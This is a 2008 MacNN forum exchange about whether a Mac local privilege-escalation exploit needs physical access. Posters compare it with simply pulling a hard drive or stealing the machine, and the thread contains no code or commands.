Local exploits have nothing to do with physical access. In this context "local" is contrasted to "remote", and just means the attacker has an unprivileged account on the machine.
Correct me if I'm wrong, but this exploit only works with physical access (gui user + terminal), no?

[ fb ] [ flickr ] [] [scl] [ last ] [ plaxo ]
     
Horsepoo!!!
Banned
Join Date: Jun 2003
Status: Offline
Reply With Quote
Jun 25, 2008, 08:26 PM
 
Originally Posted by P View Post
What TETENAL said. On Apple's current iMacs, getting to the harddrive and disassembling it takes some fifteen minutes and requires special tools. It takes about as long to put it back together, and anyone in the same room will know that you're up to no good. Not sure about the Mac mini, but it's about the same. Running a script like this would take seconds, and it can be done in the background while you're browsing or whatever.
You gotta be shittin' me. Some computers do in fact make it difficult to access the hard drive but other computers (like say a Mac Pro) is a matter of snipping a lock, pulling a latch, pulling a drawer and snatching the HD with zero tools. You might be slow to remove hard drives but even I can pull a hard drive from a machine within 1 or 2 minutes.

Not sure about the Mac mini? WTF...nobody's gonna remove a Mac mini drive, they'll just drop the Mac mini in a small bag and run.

And NO...everyone who thinks a hacker will try to hack into a computer lab computer is dumb...those machines are ghosted everyday. Even if the lab computer is compromised, the next day it won't be. And even if a hacker wanted to get to data on a lab computer, why are people insisting that it would (or rather wouldn't be) when tons of people are watching? Come on. Think McFly.

'tards be invadin' MacNN.
     
 
Thread Tools
 
Forum Links
Forum Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Top
Privacy Policy
All times are GMT -4. The time now is 03:01 PM.
All contents of these forums © 1995-2017 MacNN. All rights reserved.
Branding + Design: www.gesamtbild.com
vBulletin v.3.8.8 © 2000-2017, Jelsoft Enterprises Ltd.,